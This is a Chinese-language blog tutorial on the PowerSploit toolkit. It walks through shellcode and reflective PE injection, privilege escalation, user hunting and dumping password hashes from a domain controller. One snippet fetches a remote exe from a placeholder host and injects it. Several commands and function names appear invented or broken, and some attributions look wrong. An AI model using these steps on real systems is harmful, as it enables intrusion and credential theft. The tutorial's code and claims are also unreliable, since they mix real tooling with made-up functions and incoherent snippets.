本文將重點介紹Powersploit,並給出相關的完整的代碼示例,幫助安全人員更好地運用Powersploit進行安全評估和滲透測試。
一、Powersploit簡介
Powersploit是一款基於PowerShell的滲透測試工具,它包含了大量的漏洞利用代碼,可以用於實現多種攻擊方案,包括橫向滲透、提權、密碼攻擊、在內網中創建後門等等。
Powersploit的作者為Matt Graeber,他在多個滲透測試的項目中都使用了Powersploit的代碼。目前,Powersploit已經成為滲透測試領域的重要工具之一。
接下來,我們將通過幾個方面來詳細介紹Powersploit。
二、遠程執行代碼
在滲透測試中,我們常常需要在受控機器上遠程執行代碼,以獲取更高的許可權。Powersploit提供了Invoke-Shellcode和Invoke-ReflectivePEInjection兩個函數,可以方便地實現遠程代碼執行。
1、Invoke-Shellcode
Invoke-Shellcode函數允許我們向受控機器上注入Shellcode,從而實現遠程執行代碼的目的。下面是一個使用Invoke-Shellcode的代碼示例。
Import-Module .\Invoke-Shellcode.ps1
# 創建Shellcode
$shellcode = Invoke-Assembly -AsBytes -NetAssembly (New-Object System.Net.WebClient).DownloadData('http://xxx.xxx/xxx.exe')
# 注入Shellcode
Invoke-Shellcode -Payload $shellcode -Force
在上面的代碼中,我們首先使用Invoke-Assembly從遠程伺服器上下載了一個exe文件,並將其轉換為Shellcode,然後通過Invoke-Shellcode注入Shellcode。
2、Invoke-ReflectivePEInjection
Invoke-ReflectivePEInjection函數與Invoke-Shellcode函數相似,也可以實現遠程執行代碼的目的。但是它所採用的方法不同,一般情況下比Invoke-Shellcode更加隱蔽。下面是一個使用Invoke-ReflectivePEInjection的代碼示例。
# 創建PE文件的流
$peBytes = [System.IO.File]::ReadAllBytes('ShellCode.dll')
$peStream = New-Object System.IO.MemoryStream -argumentlist @(,$peBytes)
# 與反射注入執行所需的導出函數
$entryPoint = [Injector.InjectReflectivePE].GetMethod('ReflectiveLoader')
[byte[]]$result = Invoke-Expression -Command ([System.Text.Encoding]::UTF8.GetString(&{[IO.StreamReader]$([IO.Compression.DeflateStream]$peStream,[IO.Compression.CompressionMode]::Decompress)}))
# 執行反射注入
Invoke-ReflectivePEInjection -PEBytes $result -EntryPoint $entryPoint
在這個示例中,我們首先讀取了一個dll文件,並將其轉換為流的形式。然後將這個流與執行所需的導出函數傳遞給Invoke-ReflectivePEInjection函數,最終實現了遠程執行代碼的目的。
三、提權攻擊
在客戶機成功入侵後,我們通常需要獲取更高的許可權,以便於繼續攻擊。Powersploit提供了許多提權攻擊的函數,下面我們將介紹其中的兩個。
1、PowerUp
PowerUp是一款由Justin Bui開發的PowerShell腳本,可以自動執行一些常見的提權攻擊,並提供了詳細的輸出信息。
Import-Module .\PowerUp.ps1 # 運行PowerUp Invoke-AllChecks
在這個示例中,我們首先導入PowerUp模塊,並通過Invoke-AllChecks函數執行了所有的提權攻擊檢查。如果存在任何可利用漏洞,PowerUp將會輸出詳細的信息,以便於攻擊者進一步操作。
2、Get-System
Get-System是Powersploit中很實用的一個函數,可以幫我們以system許可權運行PowerShell腳本。下面是一個使用Get-System實現提權的示例代碼。
Import-Module .\PowerUp.ps1 # 提權至SYSTEM許可權 Invoke-AllChecks Get-System # 以SYSTEM許可權運行的PowerUp Invoke-AllChecks
在這個示例中,我們首先通過Invoke-AllChecks函數檢查當前用戶是否存在可利用漏洞,然後通過Get-System函數以system許可權運行了PowerShell腳本,最後再次運行了Invoke-AllChecks,此時PowerUp將所有可以利用的漏洞都利用了一遍。
四、橫向滲透攻擊
在內網中,攻擊者經常需要在不斷地橫向滲透。Powersploit提供了一系列用於橫向滲透的工具。
1、Invoke-UserHunter
Invoke-UserHunter是一款用於尋找內網中所有用戶的PowerShell腳本。下面是一個使用Invoke-UserHunter的示例代碼。
Import-Module .\Invoke-UserHunter.ps1 # 運行Invoke-UserHunter Invoke-UserHunter -Verbose
在這個示例中,我們導入Invoke-UserHunter模塊,並通過Invoke-UserHunter函數查找了內網中的所有用戶,並輸出了詳細的信息。
2、Invoke-UserPassHashes
Invoke-UserPassHashes是一款可以從域控制器上獲取用戶的密碼哈希值的PowerShell腳本。下面是一個使用Invoke-UserPassHashes的示例代碼。
Import-Module .\Invoke-UserPassHashes.ps1 # 獲取域控制器上的用戶密碼哈希值 $DomainController = "dc.domain.com" Invoke-UserPassHashes -DomainController $DomainController -Verbose
在這個示例中,我們通過指定域控制器IP地址,使用Invoke-UserPassHashes從域控制器上獲取了所有用戶的密碼哈希值,並輸出了詳細的信息。
五、總結
本文主要介紹了Powersploit,希望本文可以幫助讀者更好地理解和應用Powersploit進行安全評估和滲透測試。同時,我們也要注意,滲透測試只能用於授權測試,並且必須遵守相關法律法規。
原創文章,作者:ONWGJ,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/374527.html
微信掃一掃 
支付寶掃一掃 